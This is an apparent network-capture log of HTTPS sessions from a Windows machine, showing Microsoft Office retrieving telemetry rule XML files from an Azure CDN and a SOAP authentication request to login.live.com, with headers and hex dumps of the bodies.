                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    ETag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                    X-AspNetMvc-Version: 5.3
                                                                                                                                                                                                                                                                                                                    MS-CorrelationId: f6f8477c-5edc-49a4-b21e-7965443c7a7e
                                                                                                                                                                                                                                                                                                                    MS-RequestId: df08b51f-9907-4feb-a5d8-2679ca5bb9c8
                                                                                                                                                                                                                                                                                                                    MS-CV: RfLr7ZZfpSXCyARt4VNCgU.0
                                                                                                                                                                                                                                                                                                                    X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                    X-Powered-By: ARR/3.0
                                                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                    Content-Length: 11185
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:44 GMT
                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Akamai-Request-BC: [a=23.45.172.19,b=1385701755,c=g,n=US_NJ_EDISON,o=20940],[c=c,n=US_NJ_PISCATAWAY,o=20940]
                                                                                                                                                                                                                                                                                                                    MSREGION:
                                                                                                                                                                                                                                                                                                                    X-CCC:
                                                                                                                                                                                                                                                                                                                    X-CID: 3
                                                                                                                                                                                                                                                                                                                    Akamai-GRN: 0.13ac2d17.1732694804.5298217b
                                                                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET,POST,OPTIONS
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC11185INData Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    75192.168.2.74984513.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:45 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 1bb9e0d7-001e-0079-5e65-4012e8000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080645Z-174f7845968cdxdrhC1EWRg0en0000000wpg000000002q0k
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    76192.168.2.74985013.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:46 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:46 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8909076a-001e-00a2-6343-40d4d5000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080646Z-174f7845968j6t2phC1EWRcfe80000000wxg0000000009c0
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:46 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    77192.168.2.74984913.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:46 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:46 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 417b9f3b-401e-0029-4091-3f9b43000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080646Z-174f7845968n2hr8hC1EWR9cag0000000wag000000003uzs
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    78192.168.2.74985113.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:46 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:46 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3ccb05f8-401e-0016-1b69-3f53e0000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080646Z-174f7845968frfdmhC1EWRxxbw0000000wn0000000009gvn
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:46 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    79192.168.2.74985313.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:46 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:47 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 485
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: dce0685f-701e-001e-3f83-3ff5e6000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080647Z-174f7845968xr5c2hC1EWRd0hn0000000dm0000000001h78
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:47 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    80192.168.2.74985420.231.128.67443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:47 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                    Content-Length: 3592
                                                                                                                                                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:47 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 27 Nov 2024 08:05:47 GMT
                                                                                                                                                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                    x-ms-route-info: C525_BAY
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: f321182c-5e20-4c5f-a9b2-a5bd40e34528
                                                                                                                                                                                                                                                                                                                    PPServer: PPV: 30 H: PH1PEPF0001B648 V: 0
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:47 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 11389
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    81192.168.2.74985713.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:47 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:47 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 411
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 02827f85-001e-00ad-7091-3f554b000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080647Z-174f78459685726chC1EWRsnbg0000000wu0000000000ndy
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
